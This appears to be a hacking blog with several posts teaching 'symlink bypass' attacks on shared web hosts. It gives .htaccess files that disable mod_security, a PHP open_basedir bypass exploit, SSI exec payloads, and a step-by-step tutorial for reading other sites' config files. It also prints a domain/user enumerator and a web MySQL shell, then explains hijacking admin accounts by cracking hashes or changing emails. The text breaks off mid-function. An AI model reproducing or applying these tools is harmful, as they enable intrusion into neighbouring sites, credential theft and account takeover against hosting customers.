Showing posts with label Symlink. Show all posts
Showing posts with label Symlink. Show all posts

Tuesday, 15 January 2013

HostGator, HostMonster priv8 bypass

first of all, create a directory called 'r4x' or anything.


create a .htaccess file within the server, and add this code to it.


Code: (Select All)
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html


or...



Code: (Select All)
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html




OK, once you've done that, backconnect to the server, go to the following directory you created.

and type this command

"ln -s /"

done. server bypassed.


easy tip: just create a old symlink already in the server folder, then exchange the .htaccess files that I posted.

NOTE: if this method doesn't work, it may have been patched, don't blame me.

use knowledge for good

Posted by Unknown at 11:55 0 comments

Labels: , ,

PHP 5.3 SAFE MODE BYPASS (PHP SCRIPT) for SYMLINK

Usage:-
  1. Execute it.
  2. In a box, type /etc/passwd 
  3. Click on button Create Symlink.


Code: (Select All)
<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
   exit;

if(!is_writable("."))
   die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
   if(!file_exists($fakedir))
       mkdir($fakedir);
   chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
   if(!empty($hardstyle[$a])){
       if(!file_exists($hardstyle[$a]))
           mkdir($hardstyle[$a]);
       chdir($hardstyle[$a]);
       $as++;
   }
}
$as++;
while($as--)
   chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
   if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
   else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

Posted by Unknown at 11:54 0 comments

Labels: , ,

step to symlink manual using user/paswd

1 .we have a shell in a linux server and is Safe Mode OFF , if its not off Off put the file php.ini , and Disable Functions : None

Code:
http://www.website.com/shell.php
and directory :

/home/ueb/public_html/
2 . create a directory and name it "r00t" with shell with this comand in the "Command Execution" 

mkdir r00t

3 . now we have to go in the directory :

Code:
/home/ueb/public_html/r00t
4 . we write this code in notepad in ouer compurer and save ti as . htaccess this is for allow us to make symlink and reed php files in server 

Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
we save the file as "All Files" name it whatever .htaccess

5 . in this file .htaccess this file will be upload at the server in the directory " "r00t" we mak this in the option Upload on shell.
we make sure that we upload .htaccess in the root directory and not in other directorys like /home/ueb/public_html/ !

6. After that , we type this commant in shell :

Code:
ln -s / root
with this we will create a Symlink of root in serverit .

7 . now we see what we have done :

Code:
http://website.com/r00t/root/
like we see root of server ! now we go in /home and see the users and other thing we can take the control in others website that are in the same server in the server we have the shell . if in directory /home see that is Forbidden , than change the url like this :

Code:
http://website.com/r00t/root/home/uebiob...ublic_html
now see the files in target !
click in the document that have configuration

Code:
website..com/r00t/root/home/uebiobjektiv/public_html/install.php

enjoy hacking....

Posted by Unknown at 11:52 0 comments

Labels: , ,

Shtml Bypass Symlink - via 404 Error

Ok now i m going to show you, how can we bypass symlink in using Server Side Includes. Sleepy

Ok lets start,
For this method we need to find a server on the Server Side Includes. 

Code: (Select All)
cd /var/log/proftpd

more xferlog.*|grep victim.com

cat xferlog.*|grep victim.com


Now we come shtml file using a command will run ourselves
Code: (Select All)
<!--#exec cmd="more xferlog.*|grep victim.com" -->


For example, the Symlynk.
ln -s /home/...../public_html/config.php config.txt
Come face to face.
Code: (Select All)
<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->


I'll run the script that I wrote that I do not think that hatches from Litespeed.

Now we come to read config.txt file in a shtml file I create and use the following.
Code: (Select All)
<!--#include virtual="config.txt" -->


So far so error 404 
. htaccess
Code: (Select All)
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml


Done!

This method mostly work on LiteSpeed Web Server Smile

Posted by Unknown at 11:51 0 comments

Labels: , ,

Bypass Symlink

=============================================
symlink bypass with ini method
when you symlink /etc/passwd and you can read it
but symlink /home/user/public_html/config.php opposite with error :
lscgid : execve() :/home/[patch]/public_html/
now you make a .htaccess file in current directory and copy this contain in it:


then symlink with this command:


ln -s /home/user/public_html/config.php config.ini


you see bypassed error execve() :/home/[patch]/public_html/ and can
you read config.ini
====================================================


.htaccess file:


Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm


============================================================

Posted by Unknown at 11:50 0 comments

Labels: , ,

Bypass Symlink 403 (forbidden) on litespeed


edit .htaccess to bypass the





Code: (Select All)
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Posted by Unknown at 11:48 0 comments

Labels: , ,

Tuesday, 28 August 2012

Joomla Mass Scanner

Usage :

Code:
python joomla-mass.py <site> <options>
[options]
-p/-proxy <host:port> : Add proxy support
-404 : Won't show 404 responses
Ex: python joomla-mass.py www.test.com -404 -proxy 127.0.0.1:8080
Script:
Code:
#!usr/bin/python

print"####################################################"
print"# Joomla Mass Scanner Vulnerability                #"
print"# Coded By Angel Injection                         #"
print"# Copyright 2011-2012                              #"
print"# http://www.1337day.com , http://www.r00tw0rm.com #"
print"####################################################"

import sys, re, httplib, time, socket

def main(path):
 try:
  if proxy != 0:
   h.putrequest("GET", "http://"+host+"/"+path)
  else:
   h.putrequest("HEAD", path)
  h.putheader("Host", host)
  h.endheaders()
  status, reason, headers = h.getreply()
  return status, reason
 except(), msg: 
  print "Error Occurred:",msg
  pass

def timer():
 now = time.localtime(time.time())
 return time.asctime(now)


if len(sys.argv) < 2 or len(sys.argv) > 5:
 print "\nUsage: python joomla-mass.py <site> <options>"
 print "\t[options]"
 print "\t   -p/-proxy <host:port> : Add proxy support"
 print "\t   -404 : Won't show 404 responses"
 print "Ex: python joomla-mass.py www.test.com -404 -proxy 127.0.0.1:8080\n"

Posted by Unknown at 12:41 0 comments

Labels: , , , ,

Htaccess Bypass Symlink


Hi Guys :X

This Htaccess Is For Bypass Symlink... 
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
 

Posted by Unknown at 12:13 0 comments

Labels: , ,

Saturday, 25 August 2012

Symlink Full TuT

Hello guy, This is Maher Bro today I will explain how symlinking process goes step by step, in two different methods

#First Method:-
After uploading the shell make a new directory by an option or execute this command:
Quote:mkdir sym
that will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
Quote:touch .htaccess
then put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
  AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
as you can see in the following picture the file name is sym, and I'm showing the content of ".htaccess" file
[Image: kaoknd.png]
Then, execute this command:
Quote:ln -s / root
so now in our directory "sym" we have the ".htaccess" and something like this [root] (which is a symlink to /root directory)
and it will look like this:
[Image: 15g9qx4.png]
cool guyz? lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:
[Image: 4l6fv.png]
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html

#Ofcourse replace =>(user) with the target website user.
you will see something like this:
[Image: mr8mrb.png]
the user in that picture is "hillock"
now you will be able to browse that site's files.
but, we are looking for a specific file called "config.php" OR "configration.php" or some websites have different name but those are the most commen ones.
here is some famous WebApps with their configeration file location:

Quote:vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php

so after you find the configeration file, you will look for DB user and password, for example the picture below shows a joomla! configration file and I've selected the info we look for:
[Image: 14abedw.png]
after that, download sql.php from the attachments and upload it through your shell
then copy those login info from the configration file and sign in in sql.php
when you sign in, it will look something like this:
[Image: 14jnjfl.png]
I'll tell you what to do after that in the end!
=======================================
#second method:-
this method is almost the same, but we don't read the configeration file from the same site, but we symlink it to our victim's site as a .txt file, lets see how to do it!
now for this method you don't need to symlink /root directory, but you will symlink the target website's public_html
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
Code:
Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php
#Finally symlink the target website with this command:
Quote:ln -s /home/(user)/public_html (user)
then enter your directory put the URL like this:
http://www.victim.com/sym/
and you should see something like this:
[Image: 14v192q.png]
in this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configeration file! and then do the same as the first method!
============================
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in
well thats it!
hope you liked it! 
User.php
PHP Code:
<?
echo "<title>Priv8 # Domains & Users</title>
<style>
body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
</style>
<p align=center># Domains & Users</p>
<p align=center>by Priv8 </p>
<center>";

$d0mains = @file("/etc/named.conf");

if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }

echo "<table align=center border=1>
<tr bgcolor=green><td>Domains</td><td>Users</td></tr>";

foreach($d0mains as $d0main){

if(eregi("zone",$d0main)){

preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();

if(strlen(trim($domains[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();

}}}

echo "</table>
<p align='center'> Priv8
</p>
";

?>
Sql.php
PHP Code:
<?
/*
 * MySQL Web Interface By JIKo
 * -------------------------------
 * Developed By sNiper_hEx
*/

if ( function_exists('ini_get') ) {
    $onoff = ini_get('register_globals');
} else {
    $onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
    @extract($HTTP_SERVER_VARS, EXTR_SKIP);
    @extract($HTTP_COOKIE_VARS, EXTR_SKIP);
    @extract($HTTP_POST_FILES, EXTR_SKIP);
    @extract($HTTP_POST_VARS, EXTR_SKIP);
    @extract($HTTP_GET_VARS, EXTR_SKIP);
    @extract($HTTP_ENV_VARS, EXTR_SKIP);
}

function logon() {
    global $PHP_SELF;

    setcookie( "mysql_web_admin_username" );
    setcookie( "mysql_web_admin_password" );
    setcookie( "mysql_web_admin_hostname" );
    echo "<html>\n";
    echo "<head>\n";
    echo "<title>MySQL New by jiko</title>\n";
    echo "</head>\n";
    echo "<body>\n";
    echo "<table width=100% height=100%><tr><td><center>\n";
    echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
    echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
    echo "<h1>MySQL Web by jiko</h1>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=logon_submit>\n";
    echo "<table cellpadding=5 cellspacing=1>\n";
    echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
    echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
    echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
    echo "</table><p>\n";
    echo "<input type=submit value='Enter'>\n";
    echo "<input type=reset value='Clear'><br>\n";
    echo "</form>\n";
    echo "</center></td></tr></table>\n";
    echo "</center></td></tr></table>\n";
    echo "<p><hr width=300>\n";
    echo "</center></td></tr></table>\n";
    echo "</body>\n";
    echo "</html>\n";
}

function logon_submit() {
    global $username, $password, $hostname ,$PHP_SELF;
    if($hostname =='')
        $hostname = 'localhost';
    setcookie( "mysql_web_admin_username", $username );
    setcookie( "mysql_web_admin_password", $password );
    setcookie( "mysql_web_admin_hostname", $hostname );
    echo "<html>";
    echo "<head>";
    echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
    echo "</head>";
    echo "</html>";
}

function echoQueryResult() {
    global $queryStr, $errMsg;

    if( $errMsg == "" ) $errMsg = "Success";
    if( $queryStr != "" ) {
        echo "<table cellpadding=5>\n";
        echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
        echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
        echo "</table><p>\n";
    }
}

function listDatabases() {
    global $mysqlHandle, $PHP_SELF;

    echo "<h1>Databases List</h1>\n";

    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createDB>\n";
    echo "<input type=text name=dbname>\n";
    echo "<input type=submit value='Create Database'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    echo "<table cellspacing=1 cellpadding=5>\n";

    $pDB = mysql_list_dbs( $mysqlHandle );
    $num = mysql_num_rows( $pDB );
    for( $i = 0; $i < $num; $i++ ) {
        $dbname = mysql_dbname( $pDB, $i );
        echo "<tr>\n";
        echo "<td>$dbname</td>\n";
        echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
        echo "</tr>\n";
    }
    echo "</table>\n";
}

function createDatabase() {
    global $mysqlHandle, $dbname, $PHP_SELF;

    mysql_create_db( $dbname, $mysqlHandle );
    listDatabases();
}

function dropDatabase() {
    global $mysqlHandle, $dbname, $PHP_SELF;

    mysql_drop_db( $dbname, $mysqlHandle );
    listDatabases();
}

function listTables() {
    global $mysqlHandle, $dbname, $PHP_SELF;


    echo "<h1>Tables List</h1>\n";
    echo "<p class=location>$dbname</p>\n";
    echoQueryResult();
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=createTable>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text name=tablename>\n";
    echo "<input type=submit value='Create Table'>\n";
    echo "</form>\n";
    echo "<form action='$PHP_SELF'>\n";
    echo "<input type=hidden name=action value=query>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=text size=120 name=queryStr>\n";
    echo "<input type=submit value='Query'>\n";
    echo "</form>\n";
    echo "<hr>\n";

    $pTable = mysql_list_tables( $dbname );

    if( $pTable == 0 ) {
        $msg  = mysql_error();
        echo "<h3>Error : $msg</h3><p>\n";
        return;
    }
    $num = mysql_num_rows( $pTable );

    echo "<table cellspacing=1 cellpadding=5>\n";

    for( $i = 0; $i < $num; $i++ ) {
        $tablename = mysql_tablename( $pTable, $i );

        echo "<tr>\n";
        echo "<td>\n";
        echo "$tablename\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
        echo "</td>\n";
        echo "<td>\n";
        echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
        echo "</td>\n";
        echo "</tr>\n";
    }

    echo "</table>";
}

function createTable() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "CREATE TABLE $tablename ( no INT )";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    listTables();
}

function dropTable() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "DROP TABLE $tablename";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    listTables();
}

function viewSchema() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

    echo "<h1>Table Schema</h1>\n";
    echo "<p class=location>$dbname > $tablename</p>\n";

    echoQueryResult();

    echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
    echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
    echo "<hr>\n";

    $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
    $num = mysql_num_rows( $pResult );

    echo "<table cellspacing=1 cellpadding=5>\n";
    echo "<tr>\n";
    echo "<th>Field</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Null</th>\n";
    echo "<th>Key</th>\n";
    echo "<th>Default</th>\n";
    echo "<th>Extra</th>\n";
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";


    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_array( $pResult );
        echo "<tr>\n";
        echo "<td>".$field["Field"]."</td>\n";
        echo "<td>".$field["Type"]."</td>\n";
        echo "<td>".$field["Null"]."</td>\n";
        echo "<td>".$field["Key"]."</td>\n";
        echo "<td>".$field["Default"]."</td>\n";
        echo "<td>".$field["Extra"]."</td>\n";
        $fieldname = $field["Field"];
        echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
        echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
        echo "</tr>\n";
    }
    echo "</table>\n";

}

function manageField( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Field</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Field</h1>\n";
        $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
        $num = mysql_num_rows( $pResult );
        for( $i = 0; $i < $num; $i++ ) {
            $field = mysql_fetch_array( $pResult );
            if( $field["Field"] == $fieldname ) {
                $fieldtype = $field["Type"];
                $fieldkey = $field["Key"];
                $fieldextra = $field["Extra"];
                $fieldnull = $field["Null"];
                $fielddefault = $field["Default"];
                break;
            }
        }
        $type = strtok( $fieldtype, " (,)\n" );
        if( strpos( $fieldtype, "(" ) ) {
            if( $type == "enum" | $type == "set" ) {
                $valuelist = strtok( " ()\n" );
            } else {
                $M = strtok( " (,)\n" );
                if( strpos( $fieldtype, "," ) )
                    $D = strtok( " (,)\n" );
            }
        }
    }

    echo "<p class=location>$dbname > $tablename</p>\n";
    echo "<form action=$PHP_SELF>\n";

    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addField_submit>\n";
    else if( $cmd == "edit" ) {
        echo "<input type=hidden name=action value=editField_submit>\n";
        echo "<input type=hidden name=old_name value=$fieldname>\n";
    }
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";

    echo "<h3>Name</h3>\n";
    echo "<input type=text name=name value=$fieldname><p>\n";
    echo '

<h3>Type</h3>

<font size=2>
* `M\' indicates the maximum display size.<br>
* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>

<table>
<tr>
<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>

<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
<td colspan=5><center>value list</center></td>
</tr>

</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
<tr>
<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" )  ) echo "checked";echo '></td>
<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
</tr>
</table>


<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
</tr>
</table>

<p>';

    if( $cmd == "add" )
        echo "<input type=submit value='Add Field'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Field'>\n";
    echo "<input type=button value=Cancel onClick='history.back()'>\n";
    echo "</form>\n";
}

function manageField_submit( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
